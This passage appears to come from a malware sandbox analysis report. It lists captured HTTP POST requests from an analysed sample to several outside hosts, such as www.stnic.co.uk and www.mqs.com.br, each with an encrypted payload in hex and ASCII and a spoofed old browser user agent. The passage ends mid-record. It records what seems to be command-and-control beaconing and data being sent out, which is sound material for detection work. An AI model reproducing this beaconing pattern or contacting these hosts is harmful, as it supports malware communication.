58 78 71 30 2f 2f 7a 48 6a 74 50 64 2f 62 33 58 6e 73 45 6d 69 7a 39 42 79 30 46 66 79 43 55 58 34 41 36 61 31 59 33 55 49 54 74 69 31 75 2b 54 44 6d 53 74 75 37 4b 71 47 70 71 4c 66 72 6a 69 6e 36 74 2f 6a 41 50 6a 74 71 72 7a 33 55 31 31 4c 57 48 73 7a 74 61 57 46 65 48 4b 67 55 2f 43 42 6e 57 73 67 79 44 56 2b 74 51 65 67 6a 39 61 30 59 57 5a 46 31 61 64 59 35 50 31 45 37 36 38 55 31 72 51 4b 61 46 4e 48 34 7a 54 66 4e 38 30 39 7a 46 34 55 73 4d 6c 79 6f 52 37 67 4a 43 34 76 78 7a 55 79 74 77 54 61 2f 38 4a 59 57 59 77 31 79 2f 43 43 46 2f 52 6f 58 4a 4f 38 41 69 75 59 61 79 62 73 4f 4f 74 39 2f 4f 4d 48 68 53 43 33 67 56 44 66 67 79 52 33 32 37 72 39 38 55 53 53 4d 6d 4d 41 33 39 56 73 46 4a 4e 44 32 46 72 6a 35 7a 55 39 5a 6a 70 58 44 37 6a 57 7a 77 58 54 47 52 68 44 2f 47 4f 4a 57 6c 37 56 2b 56 48 54 66 34 71 41 4e 4a 4d 62 7a 65 70 73 71 70 62 7a 78 6a 7a 6e 2b 6b 65 47 6f 54 38 2f 6a 5a 71 31 31 2f 4f 66 41 7a 57 62 49 6b 4f 41 5a 78 6c 4b 62 31 46 58 77 66 71 35 59 4a 39 45 39 2f 6f 45 64 36 41 68 30 6a 4f 70 33 53 57 34 71 69 63 39 2f 45 5a 64 34 6f 7a 55 64 6d 6e 32 49 70 48 56 37 53 5a 38 35 42 4d 68 42 6f 6f 67 63 59 73 41 34 44 2f 69 43 75 4f 4a 57 38 6d 71 31 77 78 7a 78 44 71 59 30 6f 66 49 64 39 48 79 2f 32 63 34 43 43 71 Data Ascii: lEzQJYpZgMgx3X4o7XsaTU3faMA6EFpmXjSxOIGPIMJ728+8HxomrEs0LPHeqJLGvJw9Fi0ynAkMD0/KJej0y95s5P/cEJ3H7QuuNEdXI132luHK8NDweP/I1yCbFzeaXFRkGkks51HZAsReWiOeeqUqBuo3MpH4Xxq0//zHjtPd/b3XnsEmiz9By0FfyCUX4A6a1Y3UITti1u+TDmStu7KqGpqLfrjin6t/jAPjtqrz3U11LWHsztaWFeHKgU/CBnWsgyDV+tQegj9a0YWZF1adY5P1E768U1rQKaFNH4zTfN809zF4UsMlyoR7gJC4vxzUytwTa/8JYWYw1y/CCF/RoXJO8AiuYaybsOOt9/OMHhSC3gVDfgyR327r98USSMmMA39VsFJND2Frj5zU9ZjpXD7jWzwXTGRhD/GOJWl7V+VHTf4qANJMbzepsqpbzxjzn+keGoT8/jZq11/OfAzWbIkOAZxlKb1FXwfq5YJ9E9/oEd6Ah0jOp3SW4qic9/EZd4ozUdmn2IpHV7SZ85BMhBoogcYsA4D/iCuOJW8mq1wxzxDqY0ofId9Hy/2c4CCq
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 30 66 6c 33 4f 4f 63 44 61 4d 67 36 61 6d 4e 49 6c 6a 44 55 50 4c 44 43 36 5a 42 64 4b 6c 32 4d 43 31 36 58 41 45 4f 46 42 4e 78 6b 2f 51 6a 42 36 6f 58 70 77 50 65 36 7a 31 62 4c 2f 52 6a 49 57 6c 5a 6a 73 5a 68 31 30 39 6c 58 5a 2f 2b 44 77 6e 65 42 73 57 72 4f 72 2b 6d 72 44 51 35 6b 57 57 6a 5a 36 4b 32 70 2b 5a 36 4f 54 35 2b 6e 4c 5a 71 4b 53 33 63 50 54 6c 45 39 34 63 63 46 55 54 66 55 32 4e 2b 71 65 6c 4b 4c 6a 69 74 33 58 78 37 54 76 2b 70 63 4e 68 74 59 38 4f 77 32 6d 49 4d 4f 35 6c 4c 61 49 2f 34 55 4a 43 37 52 47 7a 62 30 34 64 5a 68 2f 2f 63 6f 30 31 34 36 6f 62 38 63 2b 49 6f 4c 4c 43 56 5a 63 41 4b 63 75 43 45 6b 53 30 45 7a 42 64 4a 51 33 33 6b 50 54 70 45 48 64 59 65 6f 47 50 7a 46 34 70 69 62 6a 67 33 73 51 72 77 63 6e 59 79 32 53 6b 4e 74 49 32 66 74 4c 70 79 43 78 55 53 79 6f 6c 2b 56 77 76 41 57 52 2f 31 63 65 34 43 64 6f 37 48 31 57 35 4e 66 6a 46 4d 31 36 44 46 6a 75 5a 4e 43 6a 64 2b 73 47 34 50 33 4e 72 33 46 58 42 38 71 4c 72 52 6f 38 42 53 78 6e 6d 70 44 31 7a 75 65 38 65 6a 45 41 6b 50 33 70 49 41 46 68 64 43 34 4f 30 54 2f 68 48 66 62 6b 53 6e 62 61 75 47 74 52 4d 75 77 4e 4a 65 6c 49 6f 6e 6d 62 32 6d 63 47 6e 76 47 48 46 43 37 62 52 34 35 34 43 34 2f 4f 4a 48 49 2f 2b 66 70 35 33 50 75 50 64 46 66 54 78 4d 38 46 44 65 51 44 65 30 46 54 6a 6d 78 38 37 6c 2b 6c 33 73 66 48 55 78 6d 6e 4d 36 57 4a 68 34 73 7a 66 58 2b 4b 49 64 7a 63 6b 36 73 73 6d 31 4c 50 35 4f 67 61 4b 76 42 2f 48 31 69 49 39 68 74 39 4c 53 6b 4a 70 42 65 39 2f 68 46 63 58 69 50 42 7a 45 35 65 35 73 4c 72 41 55 68 62 45 2b 2b 31 46 6a 53 6f 41 4b 65 7a 48 6c 2b 67 6a 71 45 2b 53 2f 4c 56 51 37 50 58 38 72 74 44 41 54 66 71 6f 38 6b 35 35 63 64 4e 73 50 68 46 6f 4d 4f 68 41 55 73 2b 34 78 33 46 4f 42 67 79 68 4b 69 66 4f 68 73 4e 74 47 6b 42 77 3d 3d Data Ascii: 0fl3OOcDaMg6amNIljDUPLDC6ZBdKl2MC16XAEOFBNxk/QjB6oXpwPe6z1bL/RjIWlZjsZh109lXZ/+DwneBsWrOr+mrDQ5kWWjZ6K2p+Z6OT5+nLZqKS3cPTlE94ccFUTfU2N+qelKLjit3Xx7Tv+pcNhtY8Ow2mIMO5lLaI/4UJC7RGzb04dZh//co0146ob8c+IoLLCVZcAKcuCEkS0EzBdJQ33kPTpEHdYeoGPzF4pibjg3sQrwcnYy2SkNtI2ftLpyCxUSyol+VwvAWR/1ce4Cdo7H1W5NfjFM16DFjuZNCjd+sG4P3Nr3FXB8qLrRo8BSxnmpD1zue8ejEAkP3pIAFhdC4O0T/hHfbkSnbauGtRMuwNJelIonmb2mcGnvGHFC7bR454C4/OJHI/+fp53PuPdFfTxM8FDeQDe0FTjmx87l+l3sfHUxmnM6WJh4szfX+KIdzck6ssm1LP5OgaKvB/H1iI9ht9LSkJpBe9/hFcXiPBzE5e5sLrAUhbE++1FjSoAKezHl+gjqE+S/LVQ7PX8rtDATfqo8k55cdNsPhFoMOhAUs+4x3FOBgyhKifOhsNtGkBw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 55 77 56 79 55 79 55 6c 69 73 68 38 63 54 6c 7a 7a 4a 54 63 46 70 37 34 38 38 4a 7a 62 7a 58 53 4b 57 51 35 78 43 7a 36 6c 63 69 74 30 2b 4c 58 75 2f 50 68 47 71 78 6b 39 68 64 54 32 2f 75 41 37 4b 46 68 70 41 37 53 39 51 71 76 77 52 4d 6a 57 58 51 55 67 2f 73 36 55 50 71 4c 2f 77 37 30 76 75 70 6a 6b 42 59 38 46 70 69 6b 30 2f 44 74 72 57 6d 68 55 6d 4c 4f 64 56 72 30 6d 7a 73 77 34 6f 47 74 39 67 47 4e 35 77 37 51 55 74 53 4e 6d 31 7a 72 70 7a 2f 75 2b 2b 59 6c 57 63 62 31 70 35 75 6c 74 74 2f 61 56 6b 30 30 4b 78 4d 34 57 4f 76 47 32 48 41 44 63 63 71 31 32 4d 31 72 52 52 41 6f 65 31 64 6c 6a 6e 31 4a 76 4c 30 6b 74 65 51 41 6d 72 58 57 69 52 4e 4b 55 45 33 77 58 58 69 42 33 62 4e 63 69 74 6b 73 77 47 6c 54 78 6c 4f 72 32 47 58 75 43 39 68 75 6d 52 4b 33 32 38 47 58 53 53 35 4c 59 64 4e 77 63 41 6f 42 78 4d 49 76 51 64 52 56 73 6e 6e 33 6b 75 38 50 31 6d 35 5a 42 4a 78 7a 44 69 36 5a 2f 37 42 69 52 43 4a 4c 78 52 6e 50 6e 2f 30 36 4e 4c 6b 2f 39 64 37 53 56 73 52 56 6f 6b 4e 73 6f 6e 7a 76 6b 52 63 61 54 44 61 7a 6d 58 4c 71 6d 2f 46 65 6f 59 36 61 6f 4b 32 55 56 2b 78 4e 42 6d 6f 69 43 43 46 35 50 5a 6b 75 4c 55 4f 64 2b 2b 4e 6d 6d 61 48 61 53 6d 53 50 42 65 36 45 6a 50 45 4b 71 31 50 61 68 35 78 35 51 56 70 48 52 59 39 76 74 41 58 5a 33 6d 63 45 7a 41 31 66 79 66 6a 77 64 73 78 43 74 72 4e 63 77 68 61 38 41 4e 6c 71 63 33 6f 78 78 6b 62 6b 39 72 4d 71 64 2f 56 74 6c 45 49 56 49 4c 73 50 6e 79 47 64 79 51 5a 39 5a 4d 37 39 72 71 68 6d 74 4c 36 6b 65 79 59 6d 78 70 74 6a 52 6b 65 72 56 67 31 39 4f 69 45 4b 47 38 4a 55 58 58 5a 30 77 43 74 4d 64 32 48 64 35 57 66 44 37 53 4b 68 32 74 4a 34 2b 63 33 76 45 39 65 7a 46 6f 39 50 68 49 57 39 47 65 52 4e 39 45 35 75 55 6e 77 6f 4f 37 61 6a 70 66 61 35 34 6d 77 70 37 4e 59 3d Data Ascii: UwVyUyUlish8cTlzzJTcFp7488JzbzXSKWQ5xCz6lcit0+LXu/PhGqxk9hdT2/uA7KFhpA7S9QqvwRMjWXQUg/s6UPqL/w70vupjkBY8Fpik0/DtrWmhUmLOdVr0mzsw4oGt9gGN5w7QUtSNm1zrpz/u++YlWcb1p5ultt/aVk00KxM4WOvG2HADccq12M1rRRAoe1dljn1JvL0kteQAmrXWiRNKUE3wXXiB3bNcitkswGlTxlOr2GXuC9humRK328GXSS5LYdNwcAoBxMIvQdRVsnn3ku8P1m5ZBJxzDi6Z/7BiRCJLxRnPn/06NLk/9d7SVsRVokNsonzvkRcaTDazmXLqm/FeoY6aoK2UV+xNBmoiCCF5PZkuLUOd++NmmaHaSmSPBe6EjPEKq1Pah5x5QVpHRY9vtAXZ3mcEzA1fyfjwdsxCtrNcwha8ANlqc3oxxkbk9rMqd/VtlEIVILsPnyGdyQZ9ZM79rqhmtL6keyYmxptjRkerVg19OiEKG8JUXXZ0wCtMd2Hd5WfD7SKh2tJ4+c3vE9ezFo9PhIW9GeRN9E5uUnwoO7ajpfa54mwp7NY=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxsData Raw: 47 53 76 42 55 37 4d 6e 69 73 68 37 43 67 49 6e 2b 6b 6d 2f 56 31 79 77 38 42 51 5a 65 4d 36 65 6c 2f 43 6e 2b 52 39 4f 52 51 66 2b 78 56 34 42 2b 49 46 4b 2f 6c 66 36 67 57 74 62 36 4c 54 34 35 57 5a 68 62 47 4f 61 48 59 79 4e 47 4a 48 71 4b 2f 76 62 37 53 68 72 39 62 58 71 47 66 44 73 53 4f 64 31 32 56 51 6f 55 6d 66 59 6a 33 46 46 79 53 6f 75 50 44 44 62 76 53 53 35 72 73 4a 30 76 66 6a 30 4b 53 51 54 64 46 32 68 38 6f 38 52 74 64 6a 6a 50 5a 42 74 42 35 71 71 53 6a 64 32 66 6c 63 67 44 4c 61 45 32 58 4e 48 4b 47 4b 48 6c 2f 64 55 73 67 50 43 75 62 49 64 33 74 2f 47 52 47 77 73 45 7a 39 78 51 6f 50 38 30 52 57 6d 35 6d 4b 39 4f 51 56 63 36 70 6c 4a 32 78 79 2f 75 78 5a 69 69 68 66 31 6e 35 50 59 5a 53 33 49 66 73 41 2b 42 67 6a 55 72 32 34 78 56 72 62 4f 79 73 6d 2f 68 48 4b 69 72 34 6d 46 47 57 54 6e 49 4f 69 62 63 46 4a 31 77 4b 61 4c 47 70 55 57 41 4e 31 62 4b 74 4e 30 62 6d 5a 53 77 51 2f 72 55 44 7a 6f 4f 4f 56 4a 4d 65 74 45 69 39 46 2f 53 36 6b 49 42 6c 69 34 64 7a 7a 69 58 77 54 74 2b 2b 2b 55 5a 54 33 6a 46 72 55 6b 42 6f 51 48 2f 4d 6c 2f 34 2f 4f 67 70 70 55 76 4b 62 2f 69 73 52 7a 34 51 4d 46 62 7a 45 46 4c 51 46 59 65 32 30 56 46 58 35 47 70 66 6f 38 44 71 50 65 31 7a 39 62 4d 66 46 33 2b 72 75 6a 30 79 6e 71 35 4f 55 36 73 47 69 44 43 58 73 47 73 6d 4f 56 53 7a 62 4c 64 41 34 41 54 6f 78 61 46 41 38 73 68 65 59 71 6e 43 53 55 39 69 49 64 6b 36 5a 54 71 56 7a 76 70 6f 76 33 7a 77 33 36 6b 6d 53 4c 36 67 7a 71 34 52 31 71 32 64 64 6d 47 35 58 69 4d 30 48 4c 4d 65 42 39 43 74 44 6e 2f 5a 2f 65 48 4c 70 48 46 6c 63 76 51 2f 63 34 6b 47 35 4a 48 37 47 4c 62 2b 48 67 3d Data Ascii: GSvBU7Mnish7CgIn+km/V1yw8BQZeM6el/Cn+R9ORQf+xV4B+IFK/lf6gWtb6LT45WZhbGOaHYyNGJHqK/vb7Shr9bXqGfDsSOd12VQoUmfYj3FFySouPDDbvSS5rsJ0vfj0KSQTdF2h8o8RtdjjPZBtB5qqSjd2flcgDLaE2XNHKGKHl/dUsgPCubId3t/GRGwsEz9xQoP80RWm5mK9OQVc6plJ2xy/uxZiihf1n5PYZS3IfsA+BgjUr24xVrbOysm/hHKir4mFGWTnIOibcFJ1wKaLGpUWAN1bKtN0bmZSwQ/rUDzoOOVJMetEi9F/S6kIBli4dzziXwTt+++UZT3jFrUkBoQH/Ml/4/OgppUvKb/isRz4QMFbzEFLQFYe20VFX5Gpfo8DqPe1z9bMfF3+ruj0ynq5OU6sGiDCXsGsmOVSzbLdA4AToxaFA8sheYqnCSU9iIdk6ZTqVzvpov3zw36kmSL6gzq4R1q2ddmG5XiM0HLMeB9CtDn/Z/eHLpHFlcvQ/c4kG5JH7GLb+Hg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 55 77 56 79 55 79 55 6c 69 73 68 38 63 54 6c 7a 7a 4a 54 63 46 70 37 34 38 38 4a 7a 62 7a 58 53 4b 57 51 35 78 43 7a 36 6c 63 69 74 30 2b 4c 58 75 2f 50 68 47 71 78 6b 39 68 64 54 32 2f 75 41 37 4b 46 68 70 41 37 53 39 51 71 76 77 52 4d 6a 57 58 51 55 67 2f 73 36 55 50 71 4c 2f 77 37 30 76 75 70 6a 6b 42 59 38 46 70 69 6b 30 2f 44 74 72 57 6d 68 55 6d 4c 4f 64 56 72 30 6d 7a 73 77 34 6f 47 74 39 67 47 4e 35 77 37 51 55 74 53 4e 6d 31 7a 72 70 7a 2f 75 2b 2b 59 6c 57 63 62 31 70 35 75 6c 74 74 2f 61 56 6b 30 30 4b 78 4d 34 57 4f 76 47 32 48 41 44 63 63 71 31 32 4d 31 72 52 52 41 6f 65 31 64 6c 6a 6e 31 4a 76 4c 30 6b 74 65 51 41 6d 72 58 57 69 52 4e 4b 55 45 33 77 58 58 69 42 33 62 4e 63 69 74 6b 73 77 47 6c 54 78 6c 4f 72 32 47 58 75 43 39 68 75 6d 52 4b 33 32 38 47 58 53 53 35 4c 59 64 4e 77 63 41 6f 42 78 4d 49 76 51 64 52 56 73 6e 6e 33 6b 75 38 50 31 6d 35 5a 42 4a 78 7a 44 69 36 5a 2f 37 42 69 52 43 4a 4c 78 52 6e 50 6e 2f 30 36 4e 4c 6b 2f 39 64 37 53 56 73 52 56 6f 6b 4e 73 6f 6e 7a 76 6b 52 63 61 54 44 61 7a 6d 58 4c 71 6d 2f 46 65 6f 59 36 61 6f 4b 32 55 56 2b 78 4e 42 6d 6f 69 43 43 46 35 50 5a 6b 75 4c 55 4f 64 2b 2b 4e 6d 6d 61 48 61 53 6d 53 50 42 65 36 45 6a 50 45 4b 71 31 50 61 68 35 78 35 51 56 70 48 52 59 39 76 74 41 58 5a 33 6d 63 45 7a 41 31 66 79 66 6a 77 64 73 78 43 74 72 4e 63 77 68 61 38 41 4e 6c 71 63 33 6f 78 78 6b 62 6b 39 72 4d 71 64 2f 56 74 6c 45 49 56 49 4c 73 50 6e 79 47 64 79 51 5a 39 5a 4d 37 39 72 71 68 6d 74 4c 36 6b 65 79 59 6d 78 70 74 6a 52 6b 65 72 56 67 31 39 4f 69 45 4b 47 38 4a 55 58 58 5a 30 77 43 74 4d 64 32 48 64 35 57 66 44 37 53 4b 68 32 74 4a 34 2b 63 33 76 45 39 65 7a 46 6f 39 50 68 49 57 39 47 65 52 4e 39 45 35 75 55 6e 77 6f 4f 37 61 6a 70 66 61 35 34 6d 77 70 37 4e 59 3d Data Ascii: UwVyUyUlish8cTlzzJTcFp7488JzbzXSKWQ5xCz6lcit0+LXu/PhGqxk9hdT2/uA7KFhpA7S9QqvwRMjWXQUg/s6UPqL/w70vupjkBY8Fpik0/DtrWmhUmLOdVr0mzsw4oGt9gGN5w7QUtSNm1zrpz/u++YlWcb1p5ultt/aVk00KxM4WOvG2HADccq12M1rRRAoe1dljn1JvL0kteQAmrXWiRNKUE3wXXiB3bNcitkswGlTxlOr2GXuC9humRK328GXSS5LYdNwcAoBxMIvQdRVsnn3ku8P1m5ZBJxzDi6Z/7BiRCJLxRnPn/06NLk/9d7SVsRVokNsonzvkRcaTDazmXLqm/FeoY6aoK2UV+xNBmoiCCF5PZkuLUOd++NmmaHaSmSPBe6EjPEKq1Pah5x5QVpHRY9vtAXZ3mcEzA1fyfjwdsxCtrNcwha8ANlqc3oxxkbk9rMqd/VtlEIVILsPnyGdyQZ9ZM79rqhmtL6keyYmxptjRkerVg19OiEKG8JUXXZ0wCtMd2Hd5WfD7SKh2tJ4+c3vE9ezFo9PhIW9GeRN9E5uUnwoO7ajpfa54mwp7NY=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 5a 44 71 69 57 37 41 4a 6d 38 67 77 6b 53 79 6a 77 35 46 61 4a 47 50 4d 70 46 74 59 45 70 71 31 35 44 75 33 39 4d 57 73 39 37 64 68 75 30 74 49 72 69 57 41 4a 79 61 56 74 50 74 66 42 62 69 66 44 68 50 47 2b 46 71 39 2f 71 72 48 36 36 56 50 68 4d 68 39 4f 37 4b 45 68 68 30 35 54 53 43 4f 53 47 68 67 34 37 41 53 63 47 57 36 62 63 76 63 36 45 43 66 79 77 66 43 77 31 4e 6d 77 48 53 4b 6c 41 56 2b 37 42 6a 67 70 6d 49 71 51 6e 45 6b 6d 48 33 54 70 68 58 55 38 78 48 57 49 31 66 48 6f 6b 59 47 34 50 66 32 4c 5a 58 6a 64 34 46 50 6b 72 52 39 4d 47 72 6e 75 46 37 4f 61 62 36 74 51 46 65 79 72 31 50 47 4e 34 78 57 6b 77 58 4d 35 79 79 6a 6c 62 55 4b 4f 6a 66 65 79 6b 4d 35 33 4a 76 4a 42 77 33 33 74 46 51 71 48 2f 61 55 77 63 71 49 62 76 31 78 4e 41 7a 76 79 6c 32 44 56 50 4d 6b 54 4c 4b 78 5a 42 4f 4c 45 6b 30 69 52 4f 73 6c 61 41 49 51 74 47 75 55 47 6c 52 41 57 79 32 73 62 57 50 79 63 46 48 33 61 6e 4d 7a 7a 2b 30 55 43 34 68 70 36 4d 6f 75 71 64 55 37 50 4a 74 6f 56 4b 72 62 32 32 51 57 2f 53 43 6a 58 58 6a 76 47 4a 71 56 6b 75 64 2f 30 6d 45 64 56 71 30 6e 67 69 64 65 57 4c 71 58 6d 62 6d 57 4c 5a 4d 79 72 32 31 34 6b 66 4c 68 34 7a 52 2b 2f 47 38 4e 6e 79 33 68 34 35 2f 57 33 31 41 6e 6e 55 45 4a 49 2f 6e 6d 63 6c 4b 62 30 4f 35 31 32 46 5a 52 56 4d 72 4a 57 77 61 78 5a 65 72 43 6c 50 78 6c 39 54 47 54 47 54 41 77 56 31 49 57 6e 6c 5a 37 30 4c 77 7a 77 36 38 38 73 75 46 4d 73 76 75 57 2f 7a 47 34 34 49 4d 6f 58 37 68 35 47 2f 72 48 66 69 61 50 6d 68 64 47 6d 70 62 41 7a 31 51 69 57 46 4c 47 63 34 70 37 6f 4c 5a 35 32 57 46 67 76 4c 4f 4c 4e 41 6f 30 52 44 46 33 59 4f 38 72 2b 4c 57 73 6e 70 36 66 46 67 3d 3d Data Ascii: ZDqiW7AJm8gwkSyjw5FaJGPMpFtYEpq15Du39MWs97dhu0tIriWAJyaVtPtfBbifDhPG+Fq9/qrH66VPhMh9O7KEhh05TSCOSGhg47AScGW6bcvc6ECfywfCw1NmwHSKlAV+7BjgpmIqQnEkmH3TphXU8xHWI1fHokYG4Pf2LZXjd4FPkrR9MGrnuF7Oab6tQFeyr1PGN4xWkwXM5yyjlbUKOjfeykM53JvJBw33tFQqH/aUwcqIbv1xNAzvyl2DVPMkTLKxZBOLEk0iROslaAIQtGuUGlRAWy2sbWPycFH3anMzz+0UC4hp6MouqdU7PJtoVKrb22QW/SCjXXjvGJqVkud/0mEdVq0ngideWLqXmbmWLZMyr214kfLh4zR+/G8Nny3h45/W31AnnUEJI/nmclKb0O512FZRVMrJWwaxZerClPxl9TGTGTAwV1IWnlZ70Lwzw688suFMsvuW/zG44IMoX7h5G/rHfiaPmhdGmpbAz1QiWFLGc4p7oLZ52WFgvLOLNAo0RDF3YO8r+LWsnp6fFg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 6d 49 64 63 57 63 76 32 6d 73 68 5a 58 76 63 62 49 6c 31 31 52 44 51 4c 74 70 38 52 34 59 58 47 4c 2b 31 6a 36 4d 6b 34 61 4d 4f 56 75 49 32 61 6a 57 4e 4f 61 2b 78 6d 62 38 67 2b 79 47 31 78 63 61 5a 57 73 4e 68 4b 6c 71 76 4a 30 41 71 5a 75 63 59 70 41 54 2f 6c 42 76 63 65 68 46 69 49 48 7a 6c 32 62 62 67 55 61 46 56 61 38 6a 42 57 5a 64 76 53 79 47 50 52 4f 32 4f 6c 63 6c 61 51 39 77 68 61 4c 7a 38 76 63 72 4c 47 69 6c 58 6c 78 66 43 6b 38 74 44 36 66 35 37 65 65 31 41 50 64 6d 49 73 52 35 30 53 33 4a 32 57 41 6b 49 71 50 6c 4f 56 35 59 39 6d 61 39 39 75 4f 72 6a 71 42 56 65 67 66 7a 56 65 6f 34 72 55 48 61 2b 2b 46 71 62 30 34 66 69 62 77 51 71 2f 47 44 45 77 62 48 32 53 54 32 6d 72 46 34 6f 62 6f 45 37 39 75 69 78 45 4f 6a 30 72 61 2f 33 34 5a 54 4e 33 54 4b 41 49 59 6d 51 62 2f 4f 53 34 30 71 6b 38 55 4a 47 4b 62 79 31 6b 47 77 47 63 6b 65 6d 79 69 4d 5a 47 32 48 49 6c 47 44 78 4c 47 32 61 4d 36 6a 78 2f 64 4e 30 39 5a 51 7a 69 69 45 58 6c 54 64 4e 76 66 39 4e 72 6b 55 4e 44 34 79 6a 59 30 44 69 2b 79 79 78 73 5a 78 46 5a 7a 6b 61 6a 6d 46 5a 61 43 44 42 30 72 35 75 41 63 4b 63 49 72 39 62 73 38 44 59 35 79 72 50 47 43 74 69 30 75 59 76 35 56 69 50 59 4f 62 56 76 79 57 51 58 68 6a 53 62 46 73 51 64 61 48 74 4e 55 63 6c 71 35 6e 64 61 52 55 74 48 76 62 43 64 71 7a 58 30 35 76 35 33 38 71 52 57 45 67 43 73 31 6d 77 48 70 52 51 47 68 56 79 61 66 42 68 72 57 52 6d 33 6e 49 31 71 45 46 68 71 57 41 72 7a 78 51 34 50 77 56 4f 56 63 42 62 4e 39 6f 65 5a 59 50 49 71 2b 74 4e 64 59 64 53 41 55 6a 53 61 33 51 32 57 71 4a 4a 4b 4d 44 57 53 4f 73 77 50 64 55 4e 34 74 6a 51 6d Data Ascii: mIdcWcv2mshZXvcbIl11RDQLtp8R4YXGL+1j6Mk4aMOVuI2ajWNOa+xmb8g+yG1xcaZWsNhKlqvJ0AqZucYpAT/lBvcehFiIHzl2bbgUaFVa8jBWZdvSyGPRO2OlclaQ9whaLz8vcrLGilXlxfCk8tD6f57ee1APdmIsR50S3J2WAkIqPlOV5Y9ma99uOrjqBVegfzVeo4rUHa++Fqb04fibwQq/GDEwbH2ST2mrF4oboE79uixEOj0ra/34ZTN3TKAIYmQb/OS40qk8UJGKby1kGwGckemyiMZG2HIlGDxLG2aM6jx/dN09ZQziiEXlTdNvf9NrkUND4yjY0Di+yyxsZxFZzkajmFZaCDB0r5uAcKcIr9bs8DY5yrPGCti0uYv5ViPYObVvyWQXhjSbFsQdaHtNUclq5ndaRUtHvbCdqzX05v538qRWEgCs1mwHpRQGhVyafBhrWRm3nI1qEFhqWArzxQ4PwVOVcBbN9oeZYPIq+tNdYdSAUjSa3Q2WqJJKMDWSOswPdUN4tjQm
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 6b 74 38 7a 57 58 7a 31 6d 73 69 5a 46 6e 45 74 4a 39 49 34 49 77 2f 4b 39 44 77 55 32 50 42 6c 63 4f 62 64 67 5a 67 48 70 30 52 72 58 77 54 37 61 79 4c 75 35 31 36 44 4b 55 59 64 47 59 56 41 4b 70 4c 42 66 4b 71 65 47 54 56 70 49 42 44 48 5a 70 57 46 47 4e 74 79 70 6f 6c 48 2f 51 33 6d 64 6a 70 4b 41 39 50 48 4e 53 6b 57 56 35 68 73 68 50 71 45 59 74 50 74 34 43 51 75 44 5a 32 66 34 45 55 33 54 34 7a 68 42 75 2b 32 4a 45 51 35 76 44 4d 38 6e 2b 6a 2f 73 33 57 6c 4d 65 77 2f 39 77 35 55 2b 4d 50 2f 68 55 63 53 61 63 48 46 71 4f 31 74 4d 35 43 64 71 31 39 77 32 6c 74 52 48 31 65 4f 76 6d 7a 57 36 4d 42 59 48 36 76 56 4d 52 36 45 36 4d 64 66 65 44 78 49 52 50 79 59 64 6d 55 47 62 55 49 38 35 72 64 69 58 73 66 5a 32 6e 73 56 41 33 78 31 70 6e 44 44 74 4e 6c 4b 75 69 33 47 2f 4c 57 70 2b 67 53 4b 6c 30 78 52 65 39 42 48 2b 77 64 6e 31 35 41 73 75 70 52 47 67 68 6e 6e 73 50 74 6c 6e 6b 74 36 4a 35 75 5a 6d 6b 76 45 50 78 55 46 48 54 77 72 68 44 72 32 53 39 69 6d 70 66 6b 71 65 4b 6a 61 2b 68 35 39 44 52 36 48 64 6e 55 6e 59 7a 6d 67 58 46 48 51 43 47 33 54 36 6c 55 6b 38 5a 77 4b 41 33 6a 79 46 46 48 75 75 61 68 73 6e 4e 64 4c 68 46 2b 63 2f 54 4c 71 6a 50 36 64 7a 75 4b 57 35 72 6b 4c 48 55 66 73 45 63 47 4f 32 36 50 73 41 31 6e 57 71 6b 39 76 45 6d 66 6e 38 30 4a 55 49 56 46 70 73 48 61 58 4e 44 70 77 31 67 59 4d 75 31 70 6e 75 65 45 39 4c 30 6d 4b 43 77 54 6d 48 41 30 66 34 36 30 4e 58 51 32 4f 4d 69 39 57 74 56 6a 62 31 66 47 61 4c 76 58 6c 57 4f 71 42 4c 53 72 5a 71 52 36 6d 44 53 79 2b 44 6d 4a 32 43 67 50 72 2f 77 5a 68 38 58 33 63 56 30 6a 70 6d 53 44 4b 53 77 3d 3d Data Ascii: 